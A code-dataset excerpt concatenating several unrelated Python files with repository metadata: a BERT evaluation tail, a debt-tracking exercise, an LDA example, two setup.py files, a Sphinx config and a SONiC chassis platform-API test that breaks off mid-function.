result = estimator.evaluate(
input_fn=eval_input_fn, steps=FLAGS.max_eval_steps)
output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt")
with tf.gfile.GFile(output_eval_file, "w") as writer:
tf.logging.info("***** Eval results *****")
for key in sorted(result.keys()):
tf.logging.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
if __name__ == "__main__":
flags.mark_flag_as_required("input_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
| true
| true
|
f70505938a0336b31ecf199133d778d0e94de7ec
| 514
|
py
|
Python
|
set3/p3_4.py
|
Felpezs/IPL_2021
|
eaef2baec96f16c1486f4ec5af6eff097f81fcd2
|
[
"MIT"
] | 1
|
2021-07-08T19:28:06.000Z
|
2021-07-08T19:28:06.000Z
|
set3/p3_4.py
|
Felpezs/IPL_2021
|
eaef2baec96f16c1486f4ec5af6eff097f81fcd2
|
[
"MIT"
] | null | null | null |
set3/p3_4.py
|
Felpezs/IPL_2021
|
eaef2baec96f16c1486f4ec5af6eff097f81fcd2
|
[
"MIT"
] | null | null | null |
def lend_money(debts, person, amount):
value = debts.get(person, 0)
quantity = [amount]
if value != 0:
debts[person] = value + quantity
else:
debts[person] = quantity
print(debts)
def amount_owed_by(debts, person):
value = debts.get(person, [0])
out = sum(value)
return out
def total_amount_owed(debts):
my_money = 0
for values in debts.values():
for numbers in values:
my_money += numbers
return my_money
| 21.416667
| 41
| 0.583658
|
def lend_money(debts, person, amount):
value = debts.get(person, 0)
quantity = [amount]
if value != 0:
debts[person] = value + quantity
else:
debts[person] = quantity
print(debts)
def amount_owed_by(debts, person):
value = debts.get(person, [0])
out = sum(value)
return out
def total_amount_owed(debts):
my_money = 0
for values in debts.values():
for numbers in values:
my_money += numbers
return my_money
| true
| true
|
f705065a635806e4fe8266665d0d44bcb7dfdec4
| 914
|
py
|
Python
|
scratchML/examples/linear_discriminant_analysis.py
|
TimS-ml/Scratch-ML
|
0ea010e2b7ead5f98ba9a0db621cc7d7471e97af
|
[
"MIT"
] | 4
|
2021-09-18T23:52:10.000Z
|
2021-09-25T04:04:10.000Z
|
scratchML/examples/linear_discriminant_analysis.py
|
TimS-ml/My-ML-From-Scratch
|
0ea010e2b7ead5f98ba9a0db621cc7d7471e97af
|
[
"MIT"
] | null | null | null |
scratchML/examples/linear_discriminant_analysis.py
|
TimS-ml/My-ML-From-Scratch
|
0ea010e2b7ead5f98ba9a0db621cc7d7471e97af
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from sklearn import datasets
import matplotlib.pyplot as plt
import numpy as np
from scratchML.supervised_learning import LDA
from scratchML.utils import calculate_covariance_matrix, accuracy_score
from scratchML.utils import normalize, standardize, train_test_split, Plot
from scratchML.unsupervised_learning import PCA
def main():
# Load the dataset
data = datasets.load_iris()
X = data.data
y = data.target
# Three -> two classes
X = X[y != 2]
y = y[y != 2]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)
# Fit and predict using LDA
lda = LDA()
lda.fit(X_train, y_train)
y_pred = lda.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
print("Accuracy:", accuracy)
Plot().plot_in_2d(X_test, y_pred, title="LDA", accuracy=accuracy)
if __name__ == "__main__":
main()
| 24.052632
| 77
| 0.712254
|
from __future__ import print_function
from sklearn import datasets
import matplotlib.pyplot as plt
import numpy as np
from scratchML.supervised_learning import LDA
from scratchML.utils import calculate_covariance_matrix, accuracy_score
from scratchML.utils import normalize, standardize, train_test_split, Plot
from scratchML.unsupervised_learning import PCA
def main():
data = datasets.load_iris()
X = data.data
y = data.target
X = X[y != 2]
y = y[y != 2]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)
lda = LDA()
lda.fit(X_train, y_train)
y_pred = lda.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
print("Accuracy:", accuracy)
Plot().plot_in_2d(X_test, y_pred, title="LDA", accuracy=accuracy)
if __name__ == "__main__":
main()
| true
| true
|
f70506c4e20561258cf4dc497d8803a8bee3c74e
| 1,046
|
py
|
Python
|
python_modules/libraries/dagster-papertrail/setup.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 2
|
2021-06-21T17:50:26.000Z
|
2021-06-21T19:14:23.000Z
|
python_modules/libraries/dagster-papertrail/setup.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 7
|
2022-03-16T06:55:04.000Z
|
2022-03-18T07:03:25.000Z
|
python_modules/libraries/dagster-papertrail/setup.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 1
|
2021-08-18T17:21:57.000Z
|
2021-08-18T17:21:57.000Z
|
from setuptools import find_packages, setup
def get_version():
version = {}
with open("dagster_papertrail/version.py") as fp:
exec(fp.read(), version) # pylint: disable=W0122
return version["__version__"]
if __name__ == "__main__":
setup(
name="dagster-papertrail",
version=get_version(),
author="Elementl",
author_email="hello@elementl.com",
license="Apache-2.0",
description="Package for papertrail Dagster framework components.",
url="https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-papertrail",
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
packages=find_packages(exclude=["test"]),
install_requires=["dagster"],
zip_safe=False,
)
| 32.6875
| 108
| 0.614723
|
from setuptools import find_packages, setup
def get_version():
version = {}
with open("dagster_papertrail/version.py") as fp:
exec(fp.read(), version)
return version["__version__"]
if __name__ == "__main__":
setup(
name="dagster-papertrail",
version=get_version(),
author="Elementl",
author_email="hello@elementl.com",
license="Apache-2.0",
description="Package for papertrail Dagster framework components.",
url="https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-papertrail",
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
packages=find_packages(exclude=["test"]),
install_requires=["dagster"],
zip_safe=False,
)
| true
| true
|
f70507b2d08d3c940b4529557fed1acefff47752
| 7,835
|
py
|
Python
|
docs/conf.py
|
lcd1232/django-ratelimit2
|
417c677bea537304e48a0015d07902209a2e905a
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
lcd1232/django-ratelimit2
|
417c677bea537304e48a0015d07902209a2e905a
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
lcd1232/django-ratelimit2
|
417c677bea537304e48a0015d07902209a2e905a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Django Ratelimit documentation build configuration file, created by
# sphinx-quickstart on Fri Jan 4 15:55:31 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Ratelimit'
copyright = u'2014, James Socol'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
highlight_language = 'python'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoRatelimitdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'DjangoRatelimit.tex', u'Django Ratelimit Documentation',
u'James Socol', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangoratelimit', u'Django Ratelimit Documentation',
[u'James Socol'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'DjangoRatelimit', u'Django Ratelimit Documentation',
u'James Socol', 'DjangoRatelimit', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 32.110656
| 80
| 0.716273
|
import sys, os
extensions = []
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'Django Ratelimit'
copyright = u'2014, James Socol'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
highlight_language = 'python'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoRatelimitdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'DjangoRatelimit.tex', u'Django Ratelimit Documentation',
u'James Socol', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangoratelimit', u'Django Ratelimit Documentation',
[u'James Socol'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'DjangoRatelimit', u'Django Ratelimit Documentation',
u'James Socol', 'DjangoRatelimit', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| true
| true
|
f705081a5da8e010e9ba2f98abb883270d65219a
| 2,122
|
py
|
Python
|
setup.py
|
powderflask/django_assess
|
cff25c0544a57ed9d7ddb3db3543268e51394875
|
[
"MIT"
] | null | null | null |
setup.py
|
powderflask/django_assess
|
cff25c0544a57ed9d7ddb3db3543268e51394875
|
[
"MIT"
] | null | null | null |
setup.py
|
powderflask/django_assess
|
cff25c0544a57ed9d7ddb3db3543268e51394875
|
[
"MIT"
] | null | null | null |
import sys, os, re
from setuptools import setup, Command, find_packages
from setuptools.command.test import test
class CleanCommand(Command):
"""Custom clean command to tidy up the project root."""
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
os.system('rm -vrf ./*.pyc ./*.egg-info')
def run_tests(*args):
from assessment.tests import run_tests
errors = run_tests()
if errors:
sys.exit(1)
else:
sys.exit(0)
test.run_tests = run_tests
NAME = "django-assess"
# get version without importing
with open("assessment/__init__.py", "rb") as f:
VERSION = str(re.search('__version__ = "(.+?)"', f.read().decode()).group(1))
# pull requirements
with open('requirements.txt', "r") as f:
INSTALL_REQUIREMENTS = f.read().splitlines()
setup(
name=NAME,
version=VERSION,
packages=find_packages(include=['assessment', 'assessment.*']),
python_requires='>=3.5, <4',
install_requires = INSTALL_REQUIREMENTS + [
'setuptools-git', # apparently needed to handle include_package_data from git repo?
],
license="MIT",
include_package_data=True, # declarations in MANIFEST.in
description=("Basic custom assessments as a reusable django app."),
long_description=open("README.rst").read(),
long_description_content_type="text/x-rst",
author="powderflask",
author_email="powderflask@gmail.com",
maintainer="powderflask",
maintainer_email="powderflask@gmail.com",
url="https://github.com/powderflask/django_assess",
download_url="https://github.com/powderflask/django_assess/archive/v{}.tar.gz".format(VERSION),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Framework :: Django',
],
cmdclass={
'clean' : CleanCommand,
},
test_suite="dummy",
)
| 29.472222
| 99
| 0.655985
|
import sys, os, re
from setuptools import setup, Command, find_packages
from setuptools.command.test import test
class CleanCommand(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
os.system('rm -vrf ./*.pyc ./*.egg-info')
def run_tests(*args):
from assessment.tests import run_tests
errors = run_tests()
if errors:
sys.exit(1)
else:
sys.exit(0)
test.run_tests = run_tests
NAME = "django-assess"
with open("assessment/__init__.py", "rb") as f:
VERSION = str(re.search('__version__ = "(.+?)"', f.read().decode()).group(1))
with open('requirements.txt', "r") as f:
INSTALL_REQUIREMENTS = f.read().splitlines()
setup(
name=NAME,
version=VERSION,
packages=find_packages(include=['assessment', 'assessment.*']),
python_requires='>=3.5, <4',
install_requires = INSTALL_REQUIREMENTS + [
'setuptools-git',
],
license="MIT",
include_package_data=True,
description=("Basic custom assessments as a reusable django app."),
long_description=open("README.rst").read(),
long_description_content_type="text/x-rst",
author="powderflask",
author_email="powderflask@gmail.com",
maintainer="powderflask",
maintainer_email="powderflask@gmail.com",
url="https://github.com/powderflask/django_assess",
download_url="https://github.com/powderflask/django_assess/archive/v{}.tar.gz".format(VERSION),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Framework :: Django',
],
cmdclass={
'clean' : CleanCommand,
},
test_suite="dummy",
)
| true
| true
|
f705083b28a464c87e5ea58fd371f06a46d09124
| 16,794
|
py
|
Python
|
tests/platform_tests/api/test_chassis.py
|
vdahiya12/sonic-mgmt
|
f785cd0bd07f8d2deb0b4bab16feb64f2eeba054
|
[
"Apache-2.0"
] | null | null | null |
tests/platform_tests/api/test_chassis.py
|
vdahiya12/sonic-mgmt
|
f785cd0bd07f8d2deb0b4bab16feb64f2eeba054
|
[
"Apache-2.0"
] | null | null | null |
tests/platform_tests/api/test_chassis.py
|
vdahiya12/sonic-mgmt
|
f785cd0bd07f8d2deb0b4bab16feb64f2eeba054
|
[
"Apache-2.0"
] | null | null | null |
import logging
import re
import pytest
import yaml
from tests.common.helpers.assertions import pytest_assert
from tests.common.helpers.platform_api import chassis
from platform_api_test_base import PlatformApiTestBase
logger = logging.getLogger(__name__)
pytestmark = [
pytest.mark.disable_loganalyzer, # disable automatic loganalyzer
pytest.mark.topology('any')
]
REGEX_MAC_ADDRESS = r'^([0-9A-Fa-f]{2}:){5}([0-9A-Fa-f]{2})$'
REGEX_SERIAL_NUMBER = r'^[A-Za-z0-9]+$'
# Valid OCP ONIE TlvInfo EEPROM type codes as defined here:
# https://opencomputeproject.github.io/onie/design-spec/hw_requirements.html
ONIE_TLVINFO_TYPE_CODE_PRODUCT_NAME = '0x21' # Product Name
ONIE_TLVINFO_TYPE_CODE_PART_NUMBER = '0x22' # Part Number
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER = '0x23' # Serial Number
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR = '0x24' # Base MAC Address
ONIE_TLVINFO_TYPE_CODE_MFR_DATE = '0x25' # Manufacture Date
ONIE_TLVINFO_TYPE_CODE_DEVICE_VERSION = '0x26' # Device Version
ONIE_TLVINFO_TYPE_CODE_LABEL_REVISION = '0x27' # Label Revision
ONIE_TLVINFO_TYPE_CODE_PLATFORM_NAME = '0x28' # Platform Name
ONIE_TLVINFO_TYPE_CODE_ONIE_VERSION = '0x29' # ONIE Version
ONIE_TLVINFO_TYPE_CODE_NUM_MACS = '0x2A' # Number of MAC Addresses
ONIE_TLVINFO_TYPE_CODE_MANUFACTURER = '0x2B' # Manufacturer
ONIE_TLVINFO_TYPE_CODE_COUNTRY_CODE = '0x2C' # Country Code
ONIE_TLVINFO_TYPE_CODE_VENDOR = '0x2D' # Vendor
ONIE_TLVINFO_TYPE_CODE_DIAG_VERSION = '0x2E' # Diag Version
ONIE_TLVINFO_TYPE_CODE_SERVICE_TAG = '0x2F' # Service Tag
ONIE_TLVINFO_TYPE_CODE_VENDOR_EXT = '0xFD' # Vendor Extension
ONIE_TLVINFO_TYPE_CODE_CRC32 = '0xFE' # CRC-32
class TestChassisApi(PlatformApiTestBase):
''' Platform API test cases for the Chassis class'''
#
# Functions to test methods inherited from DeviceBase class
#
def test_get_name(self, duthost, localhost, platform_api_conn):
name = chassis.get_name(platform_api_conn)
pytest_assert(name is not None, "Unable to retrieve chassis name")
pytest_assert(isinstance(name, str), "Chassis name appears incorrect")
def test_get_presence(self, duthost, localhost, platform_api_conn):
presence = chassis.get_presence(platform_api_conn)
pytest_assert(presence is not None, "Unable to retrieve chassis presence")
pytest_assert(isinstance(presence, bool), "Chassis presence appears incorrect")
# Chassis should always be present
pytest_assert(presence is True, "Chassis is not present")
def test_get_model(self, duthost, localhost, platform_api_conn):
model = chassis.get_model(platform_api_conn)
pytest_assert(model is not None, "Unable to retrieve chassis model")
pytest_assert(isinstance(model, str), "Chassis model appears incorrect")
def test_get_serial(self, duthost, localhost, platform_api_conn):
serial = chassis.get_serial(platform_api_conn)
pytest_assert(serial is not None, "Unable to retrieve chassis serial number")
pytest_assert(isinstance(serial, str), "Chassis serial number appears incorrect")
def test_get_status(self, duthost, localhost, platform_api_conn):
status = chassis.get_status(platform_api_conn)
pytest_assert(status is not None, "Unable to retrieve chassis status")
pytest_assert(isinstance(status, bool), "Chassis status appears incorrect")
#
# Functions to test methods defined in ChassisBase class
#
def test_get_base_mac(self, duthost, localhost, platform_api_conn):
# Ensure the base MAC address is sane
base_mac = chassis.get_base_mac(platform_api_conn)
pytest_assert(base_mac is not None, "Failed to retrieve base MAC address")
pytest_assert(re.match(REGEX_MAC_ADDRESS, base_mac), "Base MAC address appears to be incorrect")
if 'base_mac' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_base_mac = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['base_mac']
pytest_assert(base_mac == expected_base_mac, "Base MAC address is incorrect")
else:
logger.warning('Inventory file does not contain base MAC address for {}'.format(duthost.hostname))
def test_get_serial_number(self, duthost, localhost, platform_api_conn):
# Ensure the serial number is sane
# Note: It appears that when retrieving some variable-length fields,
# the value is padded with trailing '\x00' bytes because the field
# length is longer than the actual value, so we strip those bytes
# here before comparing. We may want to change the EEPROM parsing
# logic to ensure that trailing '\x00' bytes are removed when retreiving
# a variable-length value.
serial = chassis.get_serial_number(platform_api_conn).rstrip('\x00')
pytest_assert(serial is not None, "Failed to retrieve serial number")
pytest_assert(re.match(REGEX_SERIAL_NUMBER, serial), "Serial number appears to be incorrect")
if 'serial' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_serial = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['serial']
pytest_assert(serial == expected_serial, "Serial number is incorrect")
else:
logger.warning('Inventory file does not contain serial number for {}'.format(duthost.hostname))
def test_get_system_eeprom_info(self, duthost, localhost, platform_api_conn):
''' Test that we can retrieve sane system EEPROM info from the DUT via the platform API
'''
# OCP ONIE TlvInfo EEPROM type codes defined here: https://opencomputeproject.github.io/onie/design-spec/hw_requirements.html
VALID_ONIE_TLVINFO_TYPE_CODES_LIST = [
ONIE_TLVINFO_TYPE_CODE_PRODUCT_NAME,
ONIE_TLVINFO_TYPE_CODE_PART_NUMBER,
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER,
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR,
ONIE_TLVINFO_TYPE_CODE_MFR_DATE,
ONIE_TLVINFO_TYPE_CODE_DEVICE_VERSION,
ONIE_TLVINFO_TYPE_CODE_LABEL_REVISION,
ONIE_TLVINFO_TYPE_CODE_PLATFORM_NAME,
ONIE_TLVINFO_TYPE_CODE_ONIE_VERSION,
ONIE_TLVINFO_TYPE_CODE_NUM_MACS,
ONIE_TLVINFO_TYPE_CODE_MANUFACTURER,
ONIE_TLVINFO_TYPE_CODE_COUNTRY_CODE,
ONIE_TLVINFO_TYPE_CODE_VENDOR,
ONIE_TLVINFO_TYPE_CODE_DIAG_VERSION,
ONIE_TLVINFO_TYPE_CODE_SERVICE_TAG,
ONIE_TLVINFO_TYPE_CODE_VENDOR_EXT,
ONIE_TLVINFO_TYPE_CODE_CRC32
]
MINIMUM_REQUIRED_TYPE_CODES_LIST = [
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER,
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR,
ONIE_TLVINFO_TYPE_CODE_CRC32
]
syseeprom_info_dict = chassis.get_system_eeprom_info(platform_api_conn)
pytest_assert(syseeprom_info_dict is not None, "Failed to retrieve system EEPROM data")
pytest_assert(isinstance(syseeprom_info_dict, dict), "System EEPROM data is not in the expected format")
syseeprom_type_codes_list = syseeprom_info_dict.keys()
# Ensure that all keys in the resulting dictionary are valid ONIE TlvInfo type codes
pytest_assert(set(syseeprom_type_codes_list) <= set(VALID_ONIE_TLVINFO_TYPE_CODES_LIST), "Invalid TlvInfo type code found")
# Ensure that we were able to obtain the minimum required type codes
pytest_assert(set(MINIMUM_REQUIRED_TYPE_CODES_LIST) <= set(syseeprom_type_codes_list), "Minimum required TlvInfo type codes not provided")
# Ensure the base MAC address is sane
base_mac = syseeprom_info_dict[ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR]
pytest_assert(base_mac is not None, "Failed to retrieve base MAC address")
pytest_assert(re.match(REGEX_MAC_ADDRESS, base_mac), "Base MAC address appears to be incorrect")
# Ensure the serial number is sane
serial = syseeprom_info_dict[ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER]
pytest_assert(serial is not None, "Failed to retrieve serial number")
pytest_assert(re.match(REGEX_SERIAL_NUMBER, serial), "Serial number appears to be incorrect")
if 'syseeprom_info' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_syseeprom_info_dict = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['syseeprom_info']
pytest_assert(syseeprom_info_dict == expected_syseeprom_info_dict, "System EEPROM info is incorrect")
else:
logger.warning('Inventory file does not contain system EEPROM info for {}'.format(duthost.hostname))
def test_get_reboot_cause(self, duthost, localhost, platform_api_conn):
# TODO: Compare return values to potential combinations
reboot_cause = chassis.get_reboot_cause(platform_api_conn)
# Actual return value is a tuple, but since we're using the HTTP server
# to make the call and it uses JSON, the tuple is changed to a list
pytest_assert(reboot_cause is not None, "Failed to retrieve reboot cause")
pytest_assert(isinstance(reboot_cause, list) and len(reboot_cause) == 2, "Reboot cause appears to be incorrect")
def test_components(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of components and that the returned list is correct for this platform
try:
num_components = int(chassis.get_num_components(platform_api_conn))
except:
pytest.fail("num_components is not an integer")
component_list = chassis.get_all_components(platform_api_conn)
